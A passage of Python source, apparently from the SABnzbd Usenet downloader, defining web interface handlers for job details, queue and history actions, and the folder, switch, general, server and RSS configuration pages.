template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'login', 'main.tmpl'),
searchList=[info], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
##############################################################################
class NzoPage:
def __init__(self, root):
self.__root = root
self.__cached_selection = {} # None
@secured_expose
def default(self, *args, **kwargs):
# Allowed URL's
# /nzb/SABnzbd_nzo_xxxxx/
# /nzb/SABnzbd_nzo_xxxxx/details
# /nzb/SABnzbd_nzo_xxxxx/files
# /nzb/SABnzbd_nzo_xxxxx/bulk_operation
# /nzb/SABnzbd_nzo_xxxxx/save
nzo_id = None
for a in args:
if a.startswith('SABnzbd_nzo'):
nzo_id = a
break
nzo = NzbQueue.do.get_nzo(nzo_id)
if nzo_id and nzo:
info, pnfo_list, bytespersec, q_size, bytes_left_previous_page = build_queue_header()
# /SABnzbd_nzo_xxxxx/bulk_operation
if 'bulk_operation' in args:
return self.bulk_operation(nzo_id, kwargs)
# /SABnzbd_nzo_xxxxx/details
elif 'details' in args:
info = self.nzo_details(info, pnfo_list, nzo_id)
# /SABnzbd_nzo_xxxxx/files
elif 'files' in args:
info = self.nzo_files(info, nzo_id)
# /SABnzbd_nzo_xxxxx/save
elif 'save' in args:
self.save_details(nzo_id, args, kwargs)
return # never reached
# /SABnzbd_nzo_xxxxx/
else:
info = self.nzo_details(info, pnfo_list, nzo_id)
info = self.nzo_files(info, nzo_id)
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'nzo.tmpl'),
searchList=[info], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
else:
# Job no longer exists, go to main page
raise Raiser(cherrypy.lib.httputil.urljoin(self.__root, '../queue/'))
def nzo_details(self, info, pnfo_list, nzo_id):
slot = {}
n = 0
for pnfo in pnfo_list:
if pnfo.nzo_id == nzo_id:
nzo = NzbQueue.do.get_nzo(nzo_id)
repair = pnfo.repair
unpack = pnfo.unpack
delete = pnfo.delete
unpackopts = sabnzbd.opts_to_pp(repair, unpack, delete)
script = pnfo.script
if script is None:
script = 'None'
cat = pnfo.category
if not cat:
cat = 'None'
filename_pw = nzo.final_name_pw_clean
filename = nzo.final_name
priority = pnfo.priority
slot['nzo_id'] = str(nzo_id)
slot['cat'] = cat
slot['filename'] = filename_pw
slot['filename_clean'] = filename
slot['password'] = nzo.password or ''
slot['script'] = script
slot['priority'] = str(priority)
slot['unpackopts'] = str(unpackopts)
info['index'] = n
break
n += 1
info['slot'] = slot
info['scripts'] = list_scripts()
info['categories'] = list_cats()
info['noofslots'] = len(pnfo_list)
return info
def nzo_files(self, info, nzo_id):
active = []
nzo = NzbQueue.do.get_nzo(nzo_id)
if nzo:
pnfo = nzo.gather_info(full=True)
info['nzo_id'] = pnfo.nzo_id
info['filename'] = pnfo.filename
for nzf in pnfo.active_files:
checked = False
if nzf.nzf_id in self.__cached_selection and \
self.__cached_selection[nzf.nzf_id] == 'on':
checked = True
active.append({'filename': nzf.filename if nzf.filename else nzf.subject,
'mbleft': "%.2f" % (nzf.bytes_left / MEBI),
'mb': "%.2f" % (nzf.bytes / MEBI),
'size': format_bytes(nzf.bytes),
'sizeleft': format_bytes(nzf.bytes_left),
'nzf_id': nzf.nzf_id,
'age': calc_age(nzf.date),
'checked': checked})
info['active_files'] = active
return info
def save_details(self, nzo_id, args, kwargs):
index = kwargs.get('index', None)
name = kwargs.get('name', None)
password = kwargs.get('password', None)
if password == "":
password = None
pp = kwargs.get('pp', None)
script = kwargs.get('script', None)
cat = kwargs.get('cat', None)
priority = kwargs.get('priority', None)
nzo = NzbQueue.do.get_nzo(nzo_id)
if index is not None:
NzbQueue.do.switch(nzo_id, index)
if name is not None:
NzbQueue.do.change_name(nzo_id, name, password)
if cat is not None and nzo.cat is not cat and not (nzo.cat == '*' and cat == 'Default'):
NzbQueue.do.change_cat(nzo_id, cat, priority)
# Category changed, so make sure "Default" attributes aren't set again
if script == 'Default':
script = None
if priority == 'Default':
priority = None
if pp == 'Default':
pp = None
if script is not None and nzo.script != script:
NzbQueue.do.change_script(nzo_id, script)
if pp is not None and nzo.pp != pp:
NzbQueue.do.change_opts(nzo_id, pp)
if priority is not None and nzo.priority != int(priority):
NzbQueue.do.set_priority(nzo_id, priority)
raise Raiser(cherrypy.lib.httputil.urljoin(self.__root, '../queue/'))
def bulk_operation(self, nzo_id, kwargs):
self.__cached_selection = kwargs
if kwargs['action_key'] == 'Delete':
for key in kwargs:
if kwargs[key] == 'on':
NzbQueue.do.remove_nzf(nzo_id, key, force_delete=True)
elif kwargs['action_key'] in ('Top', 'Up', 'Down', 'Bottom'):
nzf_ids = []
for key in kwargs:
if kwargs[key] == 'on':
nzf_ids.append(key)
size = int_conv(kwargs.get('action_size', 1))
if kwargs['action_key'] == 'Top':
NzbQueue.do.move_top_bulk(nzo_id, nzf_ids)
elif kwargs['action_key'] == 'Up':
NzbQueue.do.move_up_bulk(nzo_id, nzf_ids, size)
elif kwargs['action_key'] == 'Down':
NzbQueue.do.move_down_bulk(nzo_id, nzf_ids, size)
elif kwargs['action_key'] == 'Bottom':
NzbQueue.do.move_bottom_bulk(nzo_id, nzf_ids)
if NzbQueue.do.get_nzo(nzo_id):
url = cherrypy.lib.httputil.urljoin(self.__root, nzo_id)
else:
url = cherrypy.lib.httputil.urljoin(self.__root, '../queue')
if url and not url.endswith('/'):
url += '/'
raise Raiser(url)
##############################################################################
class QueuePage:
def __init__(self, root):
self.__root = root
@secured_expose
def index(self, **kwargs):
start = int_conv(kwargs.get('start'))
limit = int_conv(kwargs.get('limit'))
search = kwargs.get('search')
info, _pnfo_list, _bytespersec = build_queue(start=start, limit=limit, trans=True, search=search)
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'queue.tmpl'),
searchList=[info], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True)
def delete(self, **kwargs):
uid = kwargs.get('uid')
del_files = int_conv(kwargs.get('del_files'))
if uid:
NzbQueue.do.remove(uid, add_to_history=False, delete_all_data=del_files)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def purge(self, **kwargs):
NzbQueue.do.remove_all(kwargs.get('search'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def change_queue_complete_action(self, **kwargs):
""" Action or script to be performed once the queue has been completed
Scripts are prefixed with 'script_'
"""
action = kwargs.get('action')
sabnzbd.change_queue_complete_action(action)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def switch(self, **kwargs):
uid1 = kwargs.get('uid1')
uid2 = kwargs.get('uid2')
if uid1 and uid2:
NzbQueue.do.switch(uid1, uid2)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def change_opts(self, **kwargs):
nzo_id = kwargs.get('nzo_id')
pp = kwargs.get('pp', '')
if nzo_id and pp and pp.isdigit():
NzbQueue.do.change_opts(nzo_id, int(pp))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def change_script(self, **kwargs):
nzo_id = kwargs.get('nzo_id')
script = kwargs.get('script', '')
if nzo_id and script:
if script == 'None':
script = None
NzbQueue.do.change_script(nzo_id, script)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def change_cat(self, **kwargs):
nzo_id = kwargs.get('nzo_id')
cat = kwargs.get('cat', '')
if nzo_id and cat:
if cat == 'None':
cat = None
NzbQueue.do.change_cat(nzo_id, cat)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def shutdown(self, **kwargs):
sabnzbd.shutdown_program()
return T('SABnzbd shutdown finished')
@secured_expose(check_session_key=True)
def pause(self, **kwargs):
scheduler.plan_resume(0)
Downloader.do.pause()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def resume(self, **kwargs):
scheduler.plan_resume(0)
sabnzbd.unpause_all()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def pause_nzo(self, **kwargs):
uid = kwargs.get('uid', '')
NzbQueue.do.pause_multiple_nzo(uid.split(','))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def resume_nzo(self, **kwargs):
uid = kwargs.get('uid', '')
NzbQueue.do.resume_multiple_nzo(uid.split(','))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def set_priority(self, **kwargs):
NzbQueue.do.set_priority(kwargs.get('nzo_id'), kwargs.get('priority'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def sort_by_avg_age(self, **kwargs):
NzbQueue.do.sort_queue('avg_age', kwargs.get('dir'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def sort_by_name(self, **kwargs):
NzbQueue.do.sort_queue('name', kwargs.get('dir'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def sort_by_size(self, **kwargs):
NzbQueue.do.sort_queue('size', kwargs.get('dir'))
raise queueRaiser(self.__root, kwargs)
##############################################################################
class HistoryPage:
def __init__(self, root):
self.__root = root
self.__failed_only = False
@secured_expose
def index(self, **kwargs):
start = int_conv(kwargs.get('start'))
limit = int_conv(kwargs.get('limit'))
search = kwargs.get('search')
failed_only = kwargs.get('failed_only')
if failed_only is None:
failed_only = self.__failed_only
history = build_header()
history['failed_only'] = failed_only
history['rating_enable'] = bool(cfg.rating_enable())
postfix = T('B') # : Abbreviation for bytes, as in GB
grand, month, week, day = BPSMeter.do.get_sums()
history['total_size'], history['month_size'], history['week_size'], history['day_size'] = \
to_units(grand, postfix=postfix), to_units(month, postfix=postfix), \
to_units(week, postfix=postfix), to_units(day, postfix=postfix)
history['lines'], history['fetched'], history['noofslots'] = build_history(limit=limit, start=start, search=search, failed_only=failed_only)
if search:
history['search'] = escape(search)
else:
history['search'] = ''
history['start'] = int_conv(start)
history['limit'] = int_conv(limit)
history['finish'] = history['start'] + history['limit']
if history['finish'] > history['noofslots']:
history['finish'] = history['noofslots']
if not history['finish']:
history['finish'] = history['fetched']
history['time_format'] = time_format
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'history.tmpl'),
searchList=[history], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True)
def purge(self, **kwargs):
history_db = sabnzbd.get_db_connection()
history_db.remove_history()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def delete(self, **kwargs):
job = kwargs.get('job')
del_files = int_conv(kwargs.get('del_files'))
if job:
jobs = job.split(',')
for job in jobs:
del_hist_job(job, del_files=del_files)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def retry_pp(self, **kwargs):
retry_job(kwargs.get('job'), kwargs.get('nzbfile'), kwargs.get('password'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def retry_all(self, **kwargs):
retry_all_jobs()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def reset(self, **kwargs):
# sabnzbd.reset_byte_counter()
raise queueRaiser(self.__root, kwargs)
@secured_expose
def scriptlog(self, **kwargs):
""" Duplicate of scriptlog of History, needed for some skins """
# No session key check, due to fixed URLs
name = kwargs.get('name')
if name:
history_db = sabnzbd.get_db_connection()
return ShowString(history_db.get_name(name), history_db.get_script_log(name))
else:
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def retry(self, **kwargs):
job = kwargs.get('job', '')
url = kwargs.get('url', '').strip()
pp = kwargs.get('pp')
cat = kwargs.get('cat')
script = kwargs.get('script')
if url:
sabnzbd.add_url(url, pp, script, cat, nzbname=kwargs.get('nzbname'))
del_hist_job(job, del_files=True)
raise Raiser(self.__root)
##############################################################################
class ConfigPage:
def __init__(self, root):
self.__root = root
self.folders = ConfigFolders('/config/folders/')
self.notify = ConfigNotify('/config/notify/')
self.general = ConfigGeneral('/config/general/')
self.rss = ConfigRss('/config/rss/')
self.scheduling = ConfigScheduling('/config/scheduling/')
self.server = ConfigServer('/config/server/')
self.switches = ConfigSwitches('/config/switches/')
self.categories = ConfigCats('/config/categories/')
self.sorting = ConfigSorting('/config/sorting/')
self.special = ConfigSpecial('/config/special/')
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['configfn'] = clip_path(config.get_filename())
conf['cmdline'] = sabnzbd.CMDLINE
conf['build'] = sabnzbd.version.__baseline__[:7]
conf['have_unzip'] = bool(sabnzbd.newsunpack.ZIP_COMMAND)
conf['have_7zip'] = bool(sabnzbd.newsunpack.SEVEN_COMMAND)
conf['have_sabyenc'] = SABYENC_ENABLED
conf['have_mt_par2'] = sabnzbd.newsunpack.PAR2_MT
conf['certificate_validation'] = sabnzbd.CERTIFICATE_VALIDATION
conf['ssl_version'] = ssl.OPENSSL_VERSION
new = {}
for svr in config.get_servers():
new[svr] = {}
conf['servers'] = new
conf['folders'] = NzbQueue.do.scan_jobs(all=False, action=False)
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True)
def restart(self, **kwargs):
logging.info('Restart requested by interface')
# Do the shutdown async to still send goodbye to browser
Thread(target=sabnzbd.trigger_restart, kwargs={'timeout': 1}).start()
return T(' <br />SABnzbd shutdown finished.<br />Wait for about 5 second and then click the button below.<br /><br /><strong><a href="..">Refresh</a></strong><br />')
@secured_expose(check_session_key=True)
def repair(self, **kwargs):
logging.info('Queue repair requested by interface')
sabnzbd.request_repair()
# Do the shutdown async to still send goodbye to browser
Thread(target=sabnzbd.trigger_restart, kwargs={'timeout': 1}).start()
return T(' <br />SABnzbd shutdown finished.<br />Wait for about 5 second and then click the button below.<br /><br /><strong><a href="..">Refresh</a></strong><br />')
##############################################################################
LIST_DIRPAGE = (
'download_dir', 'download_free', 'complete_dir', 'admin_dir',
'nzb_backup_dir', 'dirscan_dir', 'dirscan_speed', 'script_dir',
'email_dir', 'permissions', 'log_dir', 'password_file'
)
class ConfigFolders:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
for kw in LIST_DIRPAGE:
conf[kw] = config.get_config('misc', kw)()
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_folders.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveDirectories(self, **kwargs):
for kw in LIST_DIRPAGE:
value = kwargs.get(kw)
if value is not None:
if kw in ('complete_dir', 'dirscan_dir'):
msg = config.get_config('misc', kw).set(value, create=True)
else:
msg = config.get_config('misc', kw).set(value)
if msg:
# return sabnzbd.api.report('json', error=msg)
return badParameterResponse(msg, kwargs.get('ajax'))
sabnzbd.check_incomplete_vs_complete()
config.save_config()
if kwargs.get('ajax'):
return sabnzbd.api.report('json')
else:
raise Raiser(self.__root)
##############################################################################
SWITCH_LIST = \
('par_option', 'top_only', 'direct_unpack', 'enable_meta', 'win_process_prio',
'auto_sort', 'propagation_delay', 'auto_disconnect', 'flat_unpack',
'safe_postproc', 'no_dupes', 'replace_spaces', 'replace_dots',
'ignore_samples', 'pause_on_post_processing', 'nice', 'ionice',
'pre_script', 'pause_on_pwrar', 'sfv_check', 'folder_rename', 'load_balancing',
'quota_size', 'quota_day', 'quota_resume', 'quota_period', 'history_retention',
'pre_check', 'max_art_tries', 'fail_hopeless_jobs', 'enable_all_par',
'enable_recursive', 'no_series_dupes', 'series_propercheck', 'script_can_fail',
'new_nzb_on_failure', 'unwanted_extensions', 'action_on_unwanted_extensions', 'sanitize_safe',
'rating_enable', 'rating_api_key', 'rating_filter_enable',
'rating_filter_abort_audio', 'rating_filter_abort_video', 'rating_filter_abort_encrypted',
'rating_filter_abort_encrypted_confirm', 'rating_filter_abort_spam', 'rating_filter_abort_spam_confirm',
'rating_filter_abort_downvoted', 'rating_filter_abort_keywords',
'rating_filter_pause_audio', 'rating_filter_pause_video', 'rating_filter_pause_encrypted',
'rating_filter_pause_encrypted_confirm', 'rating_filter_pause_spam', 'rating_filter_pause_spam_confirm',
'rating_filter_pause_downvoted', 'rating_filter_pause_keywords'
)
class ConfigSwitches:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['certificate_validation'] = sabnzbd.CERTIFICATE_VALIDATION
conf['have_nice'] = bool(sabnzbd.newsunpack.NICE_COMMAND)
conf['have_ionice'] = bool(sabnzbd.newsunpack.IONICE_COMMAND)
conf['cleanup_list'] = cfg.cleanup_list.get_string()
for kw in SWITCH_LIST:
conf[kw] = config.get_config('misc', kw)()
conf['unwanted_extensions'] = cfg.unwanted_extensions.get_string()
conf['scripts'] = list_scripts() or ['None']
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_switches.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveSwitches(self, **kwargs):
for kw in SWITCH_LIST:
item = config.get_config('misc', kw)
value = kwargs.get(kw)
if kw == 'unwanted_extensions' and value:
value = value.lower().replace('.', '')
msg = item.set(value)
if msg:
return badParameterResponse(msg)
cleanup_list = kwargs.get('cleanup_list')
if cleanup_list and sabnzbd.WIN32:
cleanup_list = cleanup_list.lower()
cfg.cleanup_list.set(cleanup_list)
config.save_config()
raise Raiser(self.__root)
##############################################################################
SPECIAL_BOOL_LIST = \
('start_paused', 'no_penalties', 'fast_fail', 'ignore_wrong_unrar', 'overwrite_files', 'enable_par_cleanup',
'queue_complete_pers', 'api_warnings', 'ampm', 'enable_unrar', 'enable_unzip', 'enable_7zip',
'enable_filejoin', 'enable_tsjoin', 'ignore_unrar_dates', 'debug_log_decoding',
'multipar', 'osx_menu', 'osx_speed', 'win_menu', 'allow_incomplete_nzb',
'rss_filenames', 'ipv6_hosting', 'keep_awake', 'empty_postproc', 'html_login', 'wait_for_dfolder',
'max_art_opt', 'warn_empty_nzb', 'enable_bonjour', 'reject_duplicate_files', 'warn_dupl_jobs',
'replace_illegal', 'backup_for_duplicates', 'disable_api_key', 'api_logging',
'ignore_empty_files', 'x_frame_options', 'require_modern_tls'
)
SPECIAL_VALUE_LIST = \
('size_limit', 'movie_rename_limit', 'nomedia_marker', 'max_url_retries', 'req_completion_rate', 'wait_ext_drive',
'show_sysload', 'url_base', 'direct_unpack_threads', 'ipv6_servers', 'selftest_host', 'rating_host'
)
SPECIAL_LIST_LIST = ('rss_odd_titles', 'quick_check_ext_ignore', 'host_whitelist')
class ConfigSpecial:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['switches'] = [(kw, config.get_config('misc', kw)(), config.get_config('misc', kw).default()) for kw in SPECIAL_BOOL_LIST]
conf['entries'] = [(kw, config.get_config('misc', kw)(), config.get_config('misc', kw).default()) for kw in SPECIAL_VALUE_LIST]
conf['entries'].extend([(kw, config.get_config('misc', kw).get_string(), config.get_config('misc', kw).default_string()) for kw in SPECIAL_LIST_LIST])
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_special.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveSpecial(self, **kwargs):
for kw in SPECIAL_BOOL_LIST + SPECIAL_VALUE_LIST + SPECIAL_LIST_LIST:
item = config.get_config('misc', kw)
value = kwargs.get(kw)
msg = item.set(value)
if msg:
return badParameterResponse(msg)
config.save_config()
raise Raiser(self.__root)
##############################################################################
GENERAL_LIST = (
'host', 'port', 'username', 'refresh_rate', 'language', 'cache_limit',
'local_ranges', 'inet_exposure', 'enable_https', 'https_port',
'https_cert', 'https_key', 'https_chain', 'enable_https_verification',
'auto_browser', 'check_new_rel'
)
class ConfigGeneral:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
def ListColors(web_dir):
lst = []
web_dir = os.path.join(sabnzbd.DIR_INTERFACES, web_dir)
dd = os.path.abspath(web_dir + '/templates/static/stylesheets/colorschemes')
if (not dd) or (not os.access(dd, os.R_OK)):
return lst
for color in globber(dd):
col = color.replace('.css', '')
lst.append(col)
return lst
def add_color(skin_dir, color):
if skin_dir:
if not color:
try:
color = DEF_SKIN_COLORS[skin_dir.lower()]
except KeyError:
return skin_dir
return '%s - %s' % (skin_dir, color)
else:
return ''
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['configfn'] = config.get_filename()
conf['certificate_validation'] = sabnzbd.CERTIFICATE_VALIDATION
wlist = []
interfaces = globber_full(sabnzbd.DIR_INTERFACES)
for k in interfaces:
if k.endswith(DEF_STDCONFIG):
interfaces.remove(k)
continue
for web in interfaces:
rweb = os.path.basename(web)
if os.access(os.path.join(web, DEF_MAIN_TMPL), os.R_OK):
cols = ListColors(rweb)
if cols:
for col in cols:
wlist.append(add_color(rweb, col))
else:
wlist.append(rweb)
conf['web_list'] = wlist
conf['web_dir'] = add_color(cfg.web_dir(), cfg.web_color())
conf['password'] = cfg.password.get_stars()
conf['language'] = cfg.language()
lang_list = list_languages()
if len(lang_list) < 2:
lang_list = []
conf['lang_list'] = lang_list
for kw in GENERAL_LIST:
conf[kw] = config.get_config('misc', kw)()
conf['bandwidth_max'] = cfg.bandwidth_max()
conf['bandwidth_perc'] = cfg.bandwidth_perc()
conf['nzb_key'] = cfg.nzb_key()
conf['local_ranges'] = cfg.local_ranges.get_string()
conf['my_lcldata'] = cfg.admin_dir.get_clipped_path()
conf['caller_url'] = cherrypy.request.base + cfg.url_base()
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_general.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def saveGeneral(self, **kwargs):
# Handle general options
for kw in GENERAL_LIST:
item = config.get_config('misc', kw)
value = kwargs.get(kw)
msg = item.set(value)
if msg:
return badParameterResponse(msg)
# Handle special options
cfg.password.set(kwargs.get('password'))
web_dir = kwargs.get('web_dir')
change_web_dir(web_dir)
bandwidth_max = kwargs.get('bandwidth_max')
if bandwidth_max is not None:
cfg.bandwidth_max.set(bandwidth_max)
bandwidth_perc = kwargs.get('bandwidth_perc')
if bandwidth_perc is not None:
cfg.bandwidth_perc.set(bandwidth_perc)
bandwidth_perc = cfg.bandwidth_perc()
if bandwidth_perc and not bandwidth_max:
logging.warning(T('You must set a maximum bandwidth before you can set a bandwidth limit'))
config.save_config()
# Update CherryPy authentication
set_auth(cherrypy.config)
if kwargs.get('ajax'):
return sabnzbd.api.report('json', data={'success': True, 'restart_req': sabnzbd.RESTART_REQ})
else:
raise Raiser(self.__root)
def change_web_dir(web_dir):
try:
web_dir, web_color = web_dir.split(' - ')
except:
try:
web_color = DEF_SKIN_COLORS[web_dir.lower()]
except:
web_color = ''
web_dir_path = real_path(sabnzbd.DIR_INTERFACES, web_dir)
if not os.path.exists(web_dir_path):
return badParameterResponse('Cannot find web template: %s' % web_dir_path)
else:
cfg.web_dir.set(web_dir)
cfg.web_color.set(web_color)
##############################################################################
class ConfigServer:
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
new = []
servers = config.get_servers()
server_names = sorted(list(servers.keys()), key=lambda svr: '%d%02d%s' % (int(not servers[svr].enable()), servers[svr].priority(), servers[svr].displayname().lower()))
for svr in server_names:
new.append(servers[svr].get_dict(safe=True))
t, m, w, d, timeline = BPSMeter.do.amounts(svr)
if t:
new[-1]['amounts'] = to_units(t), to_units(m), to_units(w), to_units(d), timeline
conf['servers'] = new
conf['cats'] = list_cats(default=True)
conf['certificate_validation'] = sabnzbd.CERTIFICATE_VALIDATION
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_server.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def addServer(self, **kwargs):
return handle_server(kwargs, self.__root, True)
@secured_expose(check_session_key=True, check_configlock=True)
def saveServer(self, **kwargs):
return handle_server(kwargs, self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def testServer(self, **kwargs):
return handle_server_test(kwargs, self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def delServer(self, **kwargs):
kwargs['section'] = 'servers'
kwargs['keyword'] = kwargs.get('server')
del_from_section(kwargs)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def clrServer(self, **kwargs):
server = kwargs.get('server')
if server:
BPSMeter.do.clear_server(server)
raise Raiser(self.__root)
@secured_expose(check_session_key=True, check_configlock=True)
def toggleServer(self, **kwargs):
server = kwargs.get('server')
if server:
svr = config.get_config('servers', server)
if svr:
svr.enable.set(not svr.enable())
config.save_config()
Downloader.do.update_server(server, server)
raise Raiser(self.__root)
def unique_svr_name(server):
""" Return a unique variant on given server name """
num = 0
svr = 1
new_name = server
while svr:
if num:
new_name = '%s@%d' % (server, num)
else:
new_name = '%s' % server
svr = config.get_config('servers', new_name)
num += 1
return new_name
def check_server(host, port, ajax):
""" Check if server address resolves properly """
if host.lower() == 'localhost' and sabnzbd.AMBI_LOCALHOST:
return badParameterResponse(T('Warning: LOCALHOST is ambiguous, use numerical IP-address.'), ajax)
if GetServerParms(host, int_conv(port)):
return ""
else:
return badParameterResponse(T('Server address "%s:%s" is not valid.') % (host, port), ajax)
def handle_server(kwargs, root=None, new_svr=False):
""" Internal server handler """
ajax = kwargs.get('ajax')
host = kwargs.get('host', '').strip()
if not host:
return badParameterResponse(T('Server address required'), ajax)
port = kwargs.get('port', '').strip()
if not port:
if not kwargs.get('ssl', '').strip():
port = '119'
else:
port = '563'
kwargs['port'] = port
if kwargs.get('connections', '').strip() == '':
kwargs['connections'] = '1'
if kwargs.get('enable') == '1':
msg = check_server(host, port, ajax)
if msg:
return msg
# Default server name is just the host name
server = host
svr = None
old_server = kwargs.get('server')
if old_server:
svr = config.get_config('servers', old_server)
if svr:
server = old_server
else:
svr = config.get_config('servers', server)
if new_svr:
server = unique_svr_name(server)
for kw in ('ssl', 'send_group', 'enable', 'optional'):
if kw not in kwargs.keys():
kwargs[kw] = None
if svr and not new_svr:
svr.set_dict(kwargs)
else:
old_server = None
config.ConfigServer(server, kwargs)
config.save_config()
Downloader.do.update_server(old_server, server)
if root:
if ajax:
return sabnzbd.api.report('json')
else:
raise Raiser(root)
def handle_server_test(kwargs, root):
_result, msg = test_nntp_server_dict(kwargs)
return msg
##############################################################################
class ConfigRss:
def __init__(self, root):
self.__root = root
self.__refresh_readout = None # Set to URL when new readout is needed
self.__refresh_download = False # True when feed needs to be read
self.__refresh_force = False # True if forced download of all matches is required
self.__refresh_ignore = False # True if first batch of new feed must be ignored
self.__evaluate = False # True if feed needs to be re-filtered
self.__show_eval_button = False # True if the "Apply filers" button should be shown
self.__last_msg = '' # Last error message from RSS reader
@secured_expose(check_configlock=True)
def index(self, **kwargs):
conf = build_header(sabnzbd.WEB_DIR_CONFIG)
conf['scripts'] = list_scripts(default=True)
pick_script = conf['scripts'] != []
conf['categories'] = list_cats(default=True)
pick_cat = conf['categories'] != []
conf['rss_rate'] = cfg.rss_rate()
rss = {}
feeds = config.get_rss()
for feed in feeds:
rss[feed] = feeds[feed].get_dict()
filters = feeds[feed].filters()
rss[feed]['filters'] = filters
rss[feed]['filter_states'] = [bool(sabnzbd.rss.convert_filter(f[4])) for f in filters]
rss[feed]['filtercount'] = len(filters)
rss[feed]['pick_cat'] = pick_cat
rss[feed]['pick_script'] = pick_script
rss[feed]['link'] = urllib.parse.quote_plus(feed.encode('utf-8'))
rss[feed]['baselink'] = [get_base_url(uri) for uri in rss[feed]['uri']]
rss[feed]['uris'] = feeds[feed].uri.get_string()
active_feed = kwargs.get('feed', '')
conf['active_feed'] = active_feed
conf['rss'] = rss
conf['rss_next'] = time.strftime(time_format('%H:%M'), time.localtime(sabnzbd.rss.next_run()))
if active_feed:
readout = bool(self.__refresh_readout)
logging.debug('RSS READOUT = %s', readout)
if not readout:
self.__refresh_download = False
self.__refresh_force = False
self.__refresh_ignore = False
if self.__evaluate:
msg = sabnzbd.rss.run_feed(active_feed, download=self.__refresh_download, force=self.__refresh_force,
ignoreFirst=self.__refresh_ignore, readout=readout)
else:
msg = ''
self.__evaluate = False
if readout:
sabnzbd.rss.save()
self.__last_msg = msg
else:
msg = self.__last_msg
self.__refresh_readout = None
conf['evalButton'] = self.__show_eval_button
conf['error'] = msg
conf['downloaded'], conf['matched'], conf['unmatched'] = GetRssLog(active_feed)
else:
self.__last_msg = ''
# Find a unique new Feed name
unum = 1
txt = T('Feed') # : Used as default Feed name in Config->RSS
while txt + str(unum) in feeds:
unum += 1
conf['feed'] = txt + str(unum)
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'config_rss.tmpl'),
searchList=[conf], compilerSettings=CHEETAH_DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True, check_configlock=True)
def save_rss_rate(self, **kwargs):
""" Save changed RSS automatic readout rate """
cfg.rss_rate.set(kwargs.get('rss_rate'))
config.save_config()
scheduler.restart()
raise rssRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True, check_configlock=True)
def upd_rss_feed(self, **kwargs):
""" Update Feed level attributes,
legacy version: ignores 'enable' parameter
"""
if kwargs.get('enable') is not None:
del kwargs['enable']
try:
cf = config.get_rss()[kwargs.get('feed')]
except KeyError:
cf = None
